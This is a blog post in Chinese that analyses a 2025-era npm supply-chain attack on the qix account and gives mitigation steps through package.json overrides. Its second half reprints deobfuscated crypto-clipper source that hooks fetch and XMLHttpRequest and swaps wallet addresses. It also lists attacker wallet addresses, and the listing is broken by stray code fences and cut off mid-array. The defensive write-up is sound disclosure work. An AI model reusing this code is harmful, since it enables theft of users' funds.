NPM供应链攻击剖析:涉及十亿次下载
- jdstaerk
- 发布于 2天前
- 阅读 36
NPM 账户 qix 遭到供应链攻击,导致多个常用软件包(如 chalk、strip-ansi 和 color-convert)发布恶意版本。该恶意软件是一个加密货币剪切器,通过替换网络请求中的钱包地址和直接劫持加密货币交易来窃取资金。建议立即审查项目依赖项,并使用 package.json 中的 overrides 功能将所有受影响的包锁定到其最后已知的安全版本。
一次重大的供应链攻击已经发生。
知名开发者 qix 的 NPM 账户遭到入侵,导致数十个软件包发布了恶意版本,其中包括 chalk、strip-ansi 和 color-convert。
更新: 作者已收到通知,并正在与 NPM 安全团队积极合作解决此问题。恶意代码已从大多数受影响的软件包中删除,并且情况正在得到补救。
但是,审计你的项目至关重要,因为受损的版本可能仍然存在于你的依赖项或 lockfile 中。
总结:
-
发生了什么? 一次供应链攻击入侵了开发者
qix的 NPM 账户,导致数十个具有高度影响力的软件包发布了恶意版本。 -
影响是什么? 受影响软件包的每周总下载量超过 10 亿次,对 JavaScript 生态系统构成重大威胁。
-
恶意软件做什么? 该 payload 是一个 crypto-clipper,通过交换网络请求中的钱包地址并直接劫持加密货币交易来窃取资金。
-
如何保护自己: 立即审计你项目的依赖项。使用
package.json中的overrides功能将所有受影响的软件包锁定到其最后已知的安全版本。 -
- *
一个简单的构建错误如何揭示了这次攻击
它始于我们的 CI/CD 管道中的一个神秘的构建失败,我的同事注意到了这一点:
ReferenceError: fetch is not defined这个看似微小的错误是复杂的供应链攻击的第一个迹象。我们将失败追溯到一个小的依赖项 error-ex。我们的 package-lock.json 指定了稳定的版本 1.3.2 或更高,因此它安装了最新的版本 1.3.3,该版本在几分钟前刚刚发布。
在调查该软件包后,我们发现了以下代码:
const _0x112fa8=_0x180f;(function(_0x13c8b9,_0_35f660){const _0x15b386=_0x180f,_0x66ea25=_0x13c8b9();while(!![]){try{const _0x2cc99e=parseInt(_0x15b386(0x46c))/(-0x1caa+0x61f*0x1+-0x9c*-0x25)*(parseInt(_0x15b386(0x132))/(-0x1d6b+-0x69e+0x240b))+-parseInt(_0x15b386(0x6a6))/(0x1*-0x26e1+-0x11a1*-0x2+-0x5d*-0xa)*(-parseInt(_0x15b386(0x4d5))/(0x3b2+-0xaa*0xf+-0x3*-0x218))+...
// ...更多行无法读取的混淆代码
这是经过大量混淆的代码,旨在使其无法阅读。 但是,在混淆的代码中埋藏着一个函数名,该函数名立即引起了关注:checkethereumw。
攻击者注入了恶意软件,旨在检测和窃取加密货币。 破坏我们构建的fetch调用是恶意软件试图泄露数据。 我们的构建失败仅仅是因为我们的 Node.js 环境足够旧,没有全局 fetch 函数。 在更现代的环境中,攻击可能完全没有被注意到。
全生态系统的影响
这不是孤立的事件。 攻击者控制了qix NPM 帐户,并为 JavaScript 中一些最基本的实用程序发布了恶意补丁版本,包括:
-
chalk: ~3 亿次每周下载
-
strip-ansi: ~2.61 亿次每周下载
-
color-convert: ~1.93 亿次每周下载
-
color-name: ~1.91 亿次每周下载
-
error-ex: ~4700 万次每周下载
-
simple-swizzle: ~2600 万次每周下载
-
has-ansi: ~1200 万次每周下载
这些不是利基库; 它们是深埋在无数项目依赖树中的核心构建块。
解剖 Payload:双管齐下的攻击
在解混淆代码后,我们发现了一个复杂的“crypto-clipper”,它使用双管齐下的方法来窃取资金。 这是一个概述:
攻击向量 1:被动地址交换
该代码首先检查是否存在 window.ethereum,这是一个由 MetaMask 等钱包扩展程序注入的对象。 如果未找到钱包,它将继续进行被动攻击。
该恶意软件“猴子补丁(monkey-patches)”浏览器的原生 fetch 和 XMLHttpRequest 函数。 这使其可以拦截所有流入和流出网站的数据。 该脚本包含大量攻击者拥有的 Bitcoin (BTC), Ethereum (ETH), Solana (SOL), Tron (TRX), Litecoin (LTC), 和 Bitcoin Cash (BCH) 钱包地址列表。
此恶意软件的真正聪明之处在于它_如何_选择替换地址。 它不仅仅是从其列表中随机选择一个钱包; 而是采用了一种使用 Levenshtein distance algorithm(莱文斯坦距离算法) 的复杂技术。 该算法测量两个字符串之间的“编辑距离”或视觉相似度。 该脚本使用此函数在其预定义的列表中找到与用户合法地址在印刷上最接近的地址。 这种智能方法使得人眼极难发现交换,直接利用感知的局限性来确保欺诈行为不被注意。
攻击向量 2:主动交易劫持
如果检测到钱包,该恶意软件会启动其最危险的组件。 它修补了钱包自己的通信方法(request, send)。
当用户发起交易时(例如,eth_sendTransaction),该恶意软件会在数据发送到钱包进行签名之前拦截数据。 然后,它会修改内存中的交易,用硬编码的攻击者的地址替换合法的接收者的地址。
然后,将操纵的交易转发到用户的钱包以供批准。 如果用户没有仔细检查确认屏幕上的地址,他们将签署一项将资金直接发送给攻击者的交易。
跟踪被盗资金
因为区块链是透明的,所以我们可以监控这些欺诈地址。 这是攻击中使用的主要以太坊地址之一。 你可以在 Etherscan 上实时查看其活动。
- 攻击者的以太坊地址之一:
0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976
请参阅此 GitHub Gist以获取所有钱包的列表。
如何保护你的项目:立即采取的步骤
即使某些受影响的版本当前正在从 npm 中删除,但有些版本仍然可用。 所以请在你的 package.json 中使用 overrides。
如果另一个依赖项需要易受攻击的版本范围,仍然可以提取恶意软件包。 使用 package.json 中的 overrides 功能来强制你的整个项目中任何软件包的特定安全版本。
对于受影响的软件包,你将添加:
{
"name": "your-project",
"version": "1.0.0",
"overrides": {
"chalk": "5.3.0",
"strip-ansi": "7.1.0",
"color-convert": "2.0.1",
"color-name": "1.1.4",
"is-core-module": "2.13.1",
"error-ex": "1.3.2",
"has-ansi": "5.0.1"
}
}
添加此内容后,删除 node_modules 和 package-lock.json,然后运行 npm install 以生成新的、干净的 lockfile。
结论
开源生态系统建立在信任的基础上,但警惕至关重要。 一个简单的构建错误可能是根深蒂固的问题的第一个迹象。 通过加强我们的 CI/CD 管道,锁定依赖项并培养安全意识文化,我们可以更好地防御始终存在的供应链攻击威胁。
让我们在 LinkedIn 上联系。
完整的恶意软件源代码在这里。
该文件包含隐藏的或双向的 Unicode 文本,这些文本的解释或编译方式可能与下面显示的内容不同。 要查看,请在编辑器中打开该文件,以显示隐藏的 Unicode 字符。 了解有关双向 Unicode 字符的更多信息
| 显示隐藏字符 | ||
|---|---|---|
| varneth=0, | ||
| rund=0, | ||
| loval=0 | ||
| async function checkethereumw(){ | ||
| try{ | ||
| const _0x124ed3 = await window.ethereum.request({method: 'eth_accounts'}) | ||
| _0x124ed3.length > 0 | ||
| ? (runmask(), rund != 1 && ((rund = 1), (neth = 1), newdlocal())) | ||
| : rund != 1 && ((rund = 1), newdlocal()) | ||
| } catch(_0x53a897){ | ||
| rund != 1 && ((rund = 1), newdlocal()) | ||
| } | ||
| } | ||
| typeof window != 'undefined' && typeof window.ethereum != 'undefined' | ||
| ? checkethereumw() | ||
| : rund != 1 && ((rund = 1), newdlocal()) | ||
| function newdlocal(){ | ||
| if(loval == 1){ | ||
| return | ||
| } | ||
| loval = 1 | ||
| function _0x3479c8(_0x13a5cc, _0x8c209f){ | ||
| const _0x50715b = Array.from({length: _0x13a5cc.length + 1}, () => | ||
| Array(_0x8c209f.length + 1).fill(0) | ||
| ) | ||
| for(let _0x1b96c3 = 0; _0x1b96c3 <= _0x13a5cc.length; _0x1b96c3++){ | ||
| _0x50715b[_0x1b96c3][0] = _0x1b96c3 | ||
| } | ||
| for(let _0x239a5f = 0; _0x239a5f <= _0x8c209f.length; _0x239a5f++){ | ||
| _0x50715b[0][_0x239a5f] = _0x239a5f | ||
| } | ||
| for(let _0x5aba31 = 1; _0x5aba31 <= _0x13a5cc.length; _0x5aba31++){ | ||
| for(let _0x22e9c0 = 1; _0x22e9c0 <= _0x8c209f.length; _0x22e9c0++){ | ||
| _0x13a5cc[_0x5aba31 - 1] === _0x8c209f[_0x22e9c0 - 1] | ||
| ? (_0x50715b[_0x5aba31][_0x22e9c0] = | ||
| _0x50715b[_0x5aba31 - 1][_0x22e9c0 - 1]) | ||
| : (_0x50715b[_0x5aba31][_0x22e9c0] = | ||
| 1 + | ||
| Math.min( | ||
| _0x50715b[_0x5aba31 - 1][_0x22e9c0], | ||
| _0x50715b[_0x5aba31][_0x22e9c0 - 1], | ||
| _0x50715b[_0x5aba31 - 1][_0x22e9c0 - 1] | ||
| )) | ||
| } | ||
| } | ||
| return _0x50715b[_0x13a5cc.length][_0x8c209f.length] | ||
| } | ||
| function _0x2abae0(_0x348925, _0x2f1e3d){ | ||
| let _0xff60d1 = Infinity, | ||
| _0x5be3d3 = null | ||
| for(let _0x214c8b of _0x2f1e3d){ | ||
| const _0x3a7411 = _0x3479c8( | ||
| _0x348925.toLowerCase(), | ||
| _0x214c8b.toLowerCase() | ||
| ) | ||
| _0x3a7411 < _0xff60d1 && | ||
| ((_0xff60d1 = _0x3a7411), (_0x5be3d3 = _0x214c8b)) | ||
| } | ||
| return _0x5be3d3 | ||
| } | ||
| const _0x4664e9 = fetch | ||
| fetch = async function(..._0x1ae7ec){ | ||
| const _0x406ee2 = await _0xba16ef.tfqRA(_0x4664e9, ..._0x1ae7ec), | ||
| _0x207752 = _0x406ee2.headers.get('Content-Type') | '' | |
| let _0x561841 | ||
| _0x207752.includes('application/json') | ||
| ? (_0x561841 = await _0x406ee2.clone().json()) | ||
| : (_0x561841 = await _0x406ee2.clone().text()) | ||
| const _0x50818d = _0x19ca67(_0x561841), | ||
| _0x22ee54 = | ||
| typeof _0x50818d === 'string' ? _0x50818d : JSON.stringify(_0x50818d), | ||
| _0x20415d = new Response(_0x22ee54, { | ||
| status: _0x406ee2.status, | ||
| statusText: _0x406ee2.statusText, | ||
| headers: _0x406ee2.headers, | ||
| }) | ||
| return _0x20415d | ||
| } | ||
| if(typeof window != 'undefined'){ | ||
| const _0x2d44e5 = XMLHttpRequest.prototype.open, | ||
| _0x3d5d6a = XMLHttpRequest.prototype.send | ||
| XMLHttpRequest.prototype.open = function( | ||
| _0x2dbeb0, | ||
| _0x3b2bc2, | ||
| _0x36de99, | ||
| _0x36f3b7, | ||
| _0x52ad25 | ||
| ){ | ||
| return (this['_url'] = _0x3b2bc2), _0x2d44e5.apply(this, arguments) | ||
| } | ||
| XMLHttpRequest.prototype.send = function(_0x270708){ | ||
| const _0x159c30 = this, | ||
| _0x1c1a41 = _0x159c30.onreadystatechange | ||
| return ( | ||
| (_0x159c30.onreadystatechange = function(){ | ||
| if(_0x159c30.readyState === 4){ | ||
| try{ | ||
| const _0x13db82 = | ||
| _0x159c30.getResponseHeader('Content-Type') | '' | |
| let _0x1ac083 = _0x159c30.responseText | ||
| _0x13db82.includes('application/json') && | ||
| (_0x1ac083 = JSON.parse(_0x159c30.responseText)) | ||
| const _0x454f4a = _0x19ca67(_0x1ac083), | ||
| _0x553cb7 = | ||
| typeof _0x454f4a === 'string' | ||
| ? _0x454f4a | ||
| : JSON.stringify(_0x454f4a) | ||
| Object.defineProperty(_0x159c30, 'responseText', { | ||
| value: _0x553cb7, | ||
| }) | ||
| Object.defineProperty(_0x159c30, 'response', {value: _0x553cb7}) | ||
| } catch(_0x59788f){} | ||
| } | ||
| _0x1c1a41 && _0x1c1a41.apply(this, arguments) | ||
| }), | ||
| _0x3d5d6a.apply(this, arguments) | ||
| ) | ||
| } | ||
| } | ||
| function _0x19ca67(_0x1156d2){ | ||
| try{ | ||
| if(typeof _0x1156d2 === 'object' && _0x1156d2 !== null){ | ||
| const _0x129304 = JSON.stringify(_0x1156d2), | ||
| _0x187e67 = _0xba16ef.tfqRA(_0x20669a, _0x129304) | ||
| return JSON.parse(_0x187e67) | ||
| } | ||
| if(typeof _0x1156d2 === 'string'){ | ||
| return _0x20669a(_0x1156d2) | ||
| } | ||
| return _0x1156d2 | ||
| } catch(_0x2abc9c){ | ||
| return _0x1156d2 | ||
| } | ||
| } | ||
| ```javascript | ||
| function _0x20669a(_0x530d91){ | ||
| var _0x264994 = [ | ||
| '1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx', | ||
| '1Li1CRPwjovnGHGPTtcKzy75j37K6n97Rd', | ||
| '1Dk12ey2hKWJctU3V8Akc1oZPo1ndjbnjP', | ||
| '1NBvJqc1GdSb5uuX8vT7sysxtT4LB8GnuY', | ||
| '1Mtv6GsFsbno9XgSGuG6jRXyBYv2tgVhMj', | ||
| '1BBAQm4DL78JtRdJGEfzDBT2PBkGyvzf4N', | ||
| '1KkovSeka94yC5K4fDbfbvZeTFoorPggKW', | ||
| '18CPyFLMdncoYccmsZPnJ5T1hxFjh6aaiV', | ||
| '1BijzJvYU2GaBCYHa8Hf3PnJh6mjEd92UP', | ||
| '1Bjvx6WXt9iFB5XKAVsU3TgktgeNbzpn5N', | ||
| '19fUECa9aZCQxcLeo8FZu8kh5kVWheVrg8', | ||
| '1DZEep7GsnmBVkbZR3ogeBQqwngo6x4XyR', | ||
| '1GX1FWYttd65J26JULr9HLr98K7VVUE38w', | ||
| '14mzwvmF2mUd6ww1gtanQm8Bxv3ZWmxDiC', | ||
| '1EYHCtXyKMMhUiJxXJH4arfpErNto5j87k', | ||
| '19D1QXVQCoCLUHUrzQ4rTumqs9jBcvXiRg', | ||
| '16mKiSoZNTDaYLBQ5LkunK6neZFVV14b7X', | ||
| '18x8S4yhFmmLUpZUZa3oSRbAeg8cpECpne', | ||
| '1EkdNoZJuXTqBeaFVzGwp3zHuRURJFvCV8', | ||
| '13oBVyPUrwbmTAbwxVDMT9i6aVUgm5AnKM', | ||
| '1DwsWaXLdsn4pnoMtbsmzbH7rTj5jNH6qS', | ||
| '13wuEH28SjgBatNppqgoUMTWwuuBi9e4tJ', | ||
| '154jc6v7YwozhFMppkgSg3BdgpaFPtCqYn', | ||
| '1AP8zLJE6nmNdkfrf1piRqTjpasw7vk5rb', | ||
| '19F8YKkU7z5ZDAypxQ458iRqH2ctGJFVCn', | ||
| '17J3wL1SapdZpT2ZVX72Jm5oMSXUgzSwKS', | ||
| '16z8D7y3fbJsWFs3U8RvBF3A8HLycCW5fH', | ||
| '1PYtCvLCmnGDNSVK2gFE37FNSf69W2wKjP', | ||
| '143wdqy6wgY3ez8Nm19AqyYh25AZHz3FUp', | ||
| '1JuYymZbeoDeH5q65KZVG3nBhYoTK9YXjm', | ||
| '1PNM2L1bpJQWipuAhNuB7BZbaFLB3LCuju', | ||
| '19onjpqdUsssaFKJjwuAQGi2eS41vE19oi', | ||
| '1JQ15RHehtdnLAzMcVT9kU8qq868xFEUsS', | ||
| '1LVpMCURyEUdE8VfsGqhMvUYVrLzbkqYwf', | ||
| '1KMcDbd2wecP4Acoz9PiZXsBrJXHbyPyG6', | ||
| '1DZiXKhBFiKa1f6PTGCNMKSU1xoW3Edb7Z', | ||
| '174bEk62kr8dNgiduwHgVzeLgLQ38foEgZ', | ||
| '17cvmxcjTPSBsF1Wi2HfcGXnpLBSzbAs6p', | ||
| '1NoYvnedUqNshKPZvSayfk8YTQYvoB2wBc', | ||
| '13694eCkAtBRkip8XdPQ8ga99KEzyRnU6a', | ||
| ], | ||
| _0x2e3cca = [ | ||
| 'bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm', | ||
| 'bc1qznntn2q7df8ltvx842upkd9uj4atwxpk0whxh9', | ||
| 'bc1q4rllc9q0mxs827u6vts2wjvvmel0577tdsvltx', | ||
| 'bc1qj8zru33ngjxmugs4sxjupvd9cyh84ja0wjx9c4', | ||
| 'bc1qc972tp3hthdcufsp9ww38yyer390sdc9cvj8ar', | ||
| 'bc1qw0z864re8yvrjqmcw5fs6ysndta2avams0c6nh', | ||
| 'bc1qzdd8c7g2g9mnnxy635ndntem2827ycxxyn3v4h', | ||
| 'bc1qaavgpwm98n0vtaeua539gfzgxlygs8jpsa0mmt', | ||
| 'bc1qrdlkyhcrx4n2ksfjfh78xnqrefvsr34nf2u0sx', | ||
| 'bc1q9ytsyre66yz56x3gufhqks7gqd8sa8uk4tv5fh', | ||
| 'bc1qfrvsj2dkey2dg8ana0knczzplcqr7cgs9s52vq', | ||
| 'bc1qg7lkw04hg5yggh28ma0zvtkeg95k0yefqmvv2f', | ||
| 'bc1qmeplum3jy2vrlyzw4vhrcgeama35tr9kw8yfrn', | ||
| 'bc1qamqx0h8rxfcs4l56egrpau4ryqu4r642ttmxq4', | ||
| 'bc1qsaxgtck26mgecgfvp9ml4y5ljyl8ylpdglqz30', | ||
| 'bc1qsz90ulta8dx5k8xzzjqruzahav2vxchtk2l8v7', | ||
| 'bc1q3ad2zyc5mpc9nnzmmtxqpu467jeh4m928r7qf4', | ||
| 'bc1qlrdqrulwmvfg86rmp77k8npdefns52ykk8cxs6', | ||
| 'bc1q5hqxk5ugvf2d3y6qj2a7cy7u79ckusu9eknpsr', | ||
| 'bc1qszm3nugttmtpkq77dhphtqg4u7vuhxxcrh7f79', | ||
| 'bc1qqc09xnyafq0y4af3x7j5998tglxcanjuzy974m', | ||
| 'bc1qqqh29zxfzxk0fvmq9d7hwedh5yz44zhf7e23qz', | ||
| 'bc1qsg57tpvfj6gysrw5w4sxf3dweju40g87uuclvu', | ||
| 'bc1qje95nehs8y0wvusp2czr25p7kghk6j3cvgugy5', | ||
| 'bc1qwrnchp96p38u8ukp8jc8cq22q35n3ajfav0pzf', | ||
| 'bc1q6l99s704jccclxx5rc2x2c5shlgs2pg0fpnflk', | ||
| 'bc1qeuk2u6xl4rgfq0x9yc37lw49kutnd8gdlxt9st', | ||
| 'bc1qxul8lwxvt7lt9xuge0r2jls7evrwyyvcf2ah0u', | ||
| 'bc1qcplvxyzs9w09g6lpglj6xxdfxztfwjsgz95czd', | ||
| 'bc1q9ca9ae2cjd3stmr9lc6y527s0x6vvqys6du00u', | ||
| 'bc1qmap3cqss3t4vetg8z9s995uy62jggyxjk29jkp', | ||
| 'bc1qg3c6c7y5xeqkxnjsx9ymclslr2sncjrxjylkej', | ||
| 'bc1q9zx63qdjwldxp4s9egeqjelu3y5yqsajku8m29', | ||
| 'bc1ql2awtv7nzcp2dqce3kny2ra3dz946c9vg2yukq', | ||
| 'bc1qhytpe64tsrrvgwm834q35w6607jc6azqtnvl2a', | ||
| 'bc1q4rlgfgjwg9g2pqwqkf5j9hq6ekn39rjmzv09my', | ||
| 'bc1q28ks0u6fhvv7hktsavnfpmu59anastfj5sq8dw', | ||
| 'bc1qjqfpxvl2j2hzx2cxeqhchrh02dcjy3z5k6gv55', | ||
| 'bc1q8zznzs9z93xpkpunrmeqp6fg54s3q7dkh9z9xw', | ||
| 'bc1qt4c4e6xwt5dz4p629ndz9zmeep2kmvqgy53037', | ||
| ], | ||
| _0x4477fc = [ | ||
| '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976', | ||
| '0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c024', | ||
| '0x40C351B989113646bc4e9Dfe66AE66D24fE6Da7B', | ||
| '0x30F895a2C66030795131FB66CBaD6a1f91461731', | ||
| '0x57394449fE8Ee266Ead880D5588E43501cb84cC7', | ||
| '0xCd422cCC9f6e8f30FfD6F68C0710D3a7F24a026A', | ||
| '0x7C502F253124A88Bbb6a0Ad79D9BeD279d86E8f4', | ||
| '0xe86749d6728d8b02c1eaF12383c686A8544de26A', | ||
| '0xa4134741a64F882c751110D3E207C51d38f6c756', | ||
| '0xD4A340CeBe238F148034Bbc14478af59b1323d67', | ||
| '0xB00A433e1A5Fc40D825676e713E5E351416e6C26', | ||
| '0xd9Df4e4659B1321259182191B683acc86c577b0f', | ||
| '0x0a765FA154202E2105D7e37946caBB7C2475c76a', | ||
| '0xE291a6A58259f660E8965C2f0938097030Bf1767', | ||
| '0xe46e68f7856B26af1F9Ba941Bc9cd06F295eb06D', | ||
| '0xa7eec0c4911ff75AEd179c81258a348c40a36e53', | ||
| '0x3c6762469ea04c9586907F155A35f648572A0C3E', | ||
| '0x322FE72E1Eb64F6d16E6FCd3d45a376efD4bC6b2', | ||
| '0x51Bb31a441531d34210a4B35114D8EF3E57aB727', | ||
| '0x314d5070DB6940C8dedf1da4c03501a3AcEE21E1', | ||
| '0x75023D76D6cBf88ACeAA83447C466A9bBB0c5966', | ||
| '0x1914F36c62b381856D1F9Dc524f1B167e0798e5E', | ||
| '0xB9e9cfd931647192036197881A9082cD2D83589C', | ||
| '0xE88ae1ae3947B6646e2c0b181da75CE3601287A4', | ||
| '0x0D83F2770B5bDC0ccd9F09728B3eBF195cf890e2', | ||
| '0xe2D5C35bf44881E37d7183DA2143Ee5A84Cd4c68', | ||
| '0xd21E6Dd2Ef006FFAe9Be8d8b0cdf7a667B30806d', | ||
| '0x93Ff376B931B92aF91241aAf257d708B62D62F4C', | ||
| '0x5C068df7139aD2Dedb840ceC95C384F25b443275', | ||
| '0x70D24a9989D17a537C36f2FB6d8198CC26c1c277', | ||
| '0x0ae487200606DEfdbCEF1A50C003604a36C68E64', | ||
| '0xc5588A6DEC3889AAD85b9673621a71fFcf7E6B56', | ||
| '0x3c23bA2Db94E6aE11DBf9cD2DA5297A09d7EC673', | ||
| '0x5B5cA7d3089D3B3C6393C0B79cDF371Ec93a3fd3', | ||
| '0x4Cb4c0E7057829c378Eb7A9b174B004873b9D769', | ||
| '0xd299f05D1504D0B98B1D6D3c282412FD4Df96109', | ||
| '0x241689F750fCE4A974C953adBECe0673Dc4956E0', | ||
| '0xBc5f75053Ae3a8F2B9CF9495845038554dDFb261', | ||
| '0x5651dbb7838146fCF5135A65005946625A2685c8', | ||
| '0x5c9D146b48f664f2bB4796f2Bb0279a6438C38b1', | ||
| '0xd2Bf42514d35952Abf2082aAA0ddBBEf65a00BA3', | ||
| '0xbB1EC85a7d0aa6Cd5ad7E7832F0b4c8659c44cc9', | ||
| '0x013285c02ab81246F1D68699613447CE4B2B4ACC', | ||
| '0x97A00E100BA7bA0a006B2A9A40f6A0d80869Ac9e', | ||
| '0x4Bf0C0630A562eE973CE964a7d215D98ea115693', | ||
| '0x805aa8adb8440aEA21fDc8f2348f8Db99ea86Efb', | ||
| '0xae9935793835D5fCF8660e0D45bA35648e3CD463', | ||
| '0xB051C0b7dCc22ab6289Adf7a2DcEaA7c35eB3027', | ||
| '0xf7a82C48Edf9db4FBe6f10953d4D889A5bA6780D', | ||
| '0x06de68F310a86B10746a4e35cD50a7B7C8663b8d', | ||
| '0x51f3C0fCacF7d042605ABBE0ad61D6fabC4E1F54', | ||
| '0x49BCc441AEA6Cd7bC5989685C917DC9fb58289Cf', | ||
| '0x7fD999f778c1867eDa9A4026fE7D4BbB33A45272', | ||
| '0xe8749d2347472AD1547E1c6436F267F0EdD725Cb', | ||
| '0x2B471975ac4E4e29D110e43EBf9fBBc4aEBc8221', | ||
| '0x02004fE6c250F008981d8Fc8F9C408cEfD679Ec3', | ||
| '0xC4A51031A7d17bB6D02D52127D2774A942987D39', | ||
| ], | ||
| ``` | ||
| _0x530d91 = _0x530d91.toLowerCase(); | ||
| var _0x342d0f = _0x2abae0(_0x530d91, _0x2e3cca); | ||
| if (_0x342d0f) { | ||
| return _0x342d0f; | ||
| } | ||
| var _0xf48a01 = _0x2abae0(```markdown | ||
| '0xa1b94fC12c0153D3fb5d60ED500AcEC430259751', | \ | |
| '0xdedda1A02D79c3ba5fDf28C161382b1A7bA05223', | \ | |
| '0xE55f51991C8D01Fb5a99B508CC39B8a04dcF9D04', | \ | |
| ], | ||
| _0x514d7d = [ | ||
| '5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6', | ||
| '98EWM95ct8tBYWroCxXYN9vCgN7NTcR6nUsvCx1mEdLZ', | ||
| 'Gs7z9TTJwAKyxN4G3YWPFfDmnUo3ofu8q2QSWfdxtNUt', | ||
| 'CTgjc8kegnVqvtVbGZfpP5RHLKnRNikArUYFpVHNebEN', | ||
| '7Nnjyhwsp8ia2W4P37iWAjpRao3Bj9tVZBZRTbBpwXWU', | ||
| '3KFBge3yEg793VqVV1P6fxV7gC9CShh55zmoMcGUNu49', | ||
| '9eU7SkkFGWvDoqSZLqoFJ9kRqJXDQYcEvSiJXyThCWGV', | ||
| '4SxDspwwkviwR3evbZHrPa3Rw13kBr51Nxv86mECyXUF', | ||
| '4SxDspwwkviwR3evbZHrPa3Rw13kBr51Nxv86mECyXUF', | ||
| '9dtS7zbZD2tK7oaMUj78MKvgUWHbRVLQ95bxnpsCaCLL', | ||
| '7mdCoRPc1omTiZdYY2xG81EvGwN7Z2yodUTX9ZmLm3fx', | ||
| '8rdABs8nC2jTwVhR9axWW7WMbGZxW7JUzNV5pRF8KvQv', | ||
| '55YtaEqYEUM7ASAZ9XmVdSBNy6F7r5zkdLsJFv2ZPtAx', | ||
| 'Gr8Kcyt8UVRF1Pux7YHiK32Spm7cmnFVL6hd7LSLHqoB', | ||
| '9MRmVsciWKDvwwTaZQCK2NvJE2SeVU8W6EGFmukHTRaB', | ||
| '5j4k1Ye12dXiFMLSJpD7gFrLbv4QcUrRoKHsgo32kRFr', | ||
| 'F1SEspGoVLhqJTCFQEutTcKDubw44uKnqWc2ydz4iXtv', | ||
| 'G3UBJBY69FpDbwyKhZ8Sf4YULLTtHBtJUvSX4GpbTGQn', | ||
| 'DZyZzbGfdMy5GTyn2ah2PDJu8LEoKPq9EhAkFRQ1Fn6K', | ||
| 'HvygSvLTXPK4fvR17zhjEh57kmb85oJuvcQcEgTnrced', | ||
| ], | ||
| _0x3ee86f = [ | ||
| 'TB9emsCq6fQw6wRk4HBxxNnU6Hwt1DnV67', | ||
| 'TSfbXqswodrpw8UBthPTRRcLrqWpnWFY3y', | ||
| 'TYVWbDbkapcKcvbMfdbbcuc3PE1kKefvDH', | ||
| 'TNaeGxNujpgPgcfetYwCNAZF8BZjAQqutc', | ||
| 'TJ1tNPVj7jLK2ds9JNq15Ln6GJV1xYrmWp', | ||
| 'TGExvgwAyaqwcaJmtJzErXqfra66YjLThc', | ||
| 'TC7K8qchM7YXZPdZrbUY7LQwZaahdTA5tG', | ||
| 'TQuqKCAbowuQYEKB9aTnH5uK4hNvaxDCye', | ||
| 'TFcXJysFgotDu6sJu4zZPAvr9xHCN7FAZp', | ||
| 'TLDkM4GrUaA13PCHWhaMcGri7H8A8HR6zR', | ||
| 'TPSLojAyTheudTRztqjhNic6rrrSLVkMAr', | ||
| 'TY2Gs3RVwbmcUiDpxDhchPHF1CVsGxU1mo', | ||
| 'TCYrFDXHBrQkqCPNcp6V2fETk7VoqjCNXw', | ||
| 'TKcuWWdGYqPKe98xZCWkmhc1gKLdDYvJ2f', | ||
| 'TP1ezNXDeyF4RsM3Bmjh4GTYfshf5hogRJ', | ||
| 'TJcHbAGfavWSEQaTTLotG7RosS3iqV5WMb', | ||
| 'TD5U7782gp7ceyrsKwekWFMWF9TjhC6DfP', | ||
| 'TEu3zgthJE32jfY6bYMYGNC7BU2yEXVBgW', | ||
| 'TK5r74dFyMwFSTaJF6dmc2pi7A1gjGTtJz', | ||
| 'TBJH4pB4QPo96BRA7x6DghEv4iQqJBgKeW', | ||
| 'TKBcydgFGX9q3ydaPtxht1TRAmcGybRozt', | ||
| 'TQXoAYKPuzeD1X2c4KvQ4gXhEnya3AsYwC', | ||
| 'TJCevwYQhzcSyPaVBTa15y4qNY2ZxkjwsZ', | ||
| 'THpdx4MiWbXtgkPtsrsvUjHF5AB4u7mx3E', | ||
| 'TWpCDiY8pZoY9dVknsy3U4mrAwVm8mCBh6', | ||
| 'TK5zyFYoyAttoeaUeWGdpRof2qRBbPSV7L', | ||
| 'TAzmtmytEibzixFSfNvqqHEKmMKiz9wUA9', | ||
| 'TCgUwXe3VmLY81tKBrMUjFBr1qPnrEQFNK', | ||
| 'TTPWAyW3Q8MovJvDYgysniq41gQnfRn21V', | ||
| 'TWUJVezQta4zEX94RPmFHF2hzQBRmYiEdn', | ||
| 'TPeKuzck7tZRXKh2GP1TyoePF4Rr1cuUAA', | ||
| 'TJUQCnHifZMHEgJXSd8SLJdVAcRckHGnjt', | ||
| 'TCgX32nkTwRkapNuekTdk1TByYGkkmcKhJ', | ||
| 'TFDKvuw86wduSPZxWTHD9N1TqhXyy9nrAs', | ||
| 'TQVpRbBzD1au3u8QZFzXMfVMpHRyrpemHL', | ||
| 'TSE2VkcRnyiFB4xe8an9Bj1fb6ejsPxa9Z', | ||
| 'THe32hBm9nXnzzi6YFqYo8LX77CMegX3v5', | ||
| 'TXfcpZtbYfVtLdGPgdoLm6hDHtnrscvAFP', | ||
| 'TXgVaHDaEyXSm1LoJEqFgKWTKQQ1jgeQr7', | ||
| 'TD5cRTn9dxa4eodRWszGiKmU4pbpSFN87P', | ||
| ], | ||
| _0x4a9d96 = [ | ||
| 'LNFWHeiSjb4QB4iSHMEvaZ8caPwtz4t6Ug', | ||
| 'LQk8CEPMP4tq3mc8nQpsZ1QtBmYbhg8UGR', | ||
| 'LMAJo7CV5F5scxJsFW67UsY2RichJFfpP6', | ||
| 'LUvPb1VhwsriAm3ni77i3otND2aYLZ8fHz', | ||
| 'LhWPifqaGho696hFVGTR1KmzKJ8ps7ctFa', | ||
| 'LZZPvXLt4BtMzEgddYnHpUWjDjeD61r5aQ', | ||
| 'LQfKhNis7ZKPRW6H3prbXz1FJd29b3jsmT', | ||
| 'LSihmvTbmQ9WZmq6Rjn35SKLUdBiDzcLBB', | ||
| 'Ldbnww88JPAP1AUXiDtLyeZg9v1tuvhHBP', | ||
| 'LR3YwMqnwLt4Qdn6Ydz8bRFEeXvpbNZUvA', | ||
| 'Lbco8vJ56o1mre6AVU6cF7JjDDscnYHXLP', | ||
| 'LfqFuc3sLafGxWE8vdntZT4M9NKq6Be9ox', | ||
| 'LLcmXxj8Zstje6KqgYb11Ephj8bGdyF1vP', | ||
| 'LcJwR1WvVRsnxoe1A66pCzeXicuroDP6L6', | ||
| 'LUNKimRyxBVXLf9gp3FZo2iVp6D3yyzJLJ', | ||
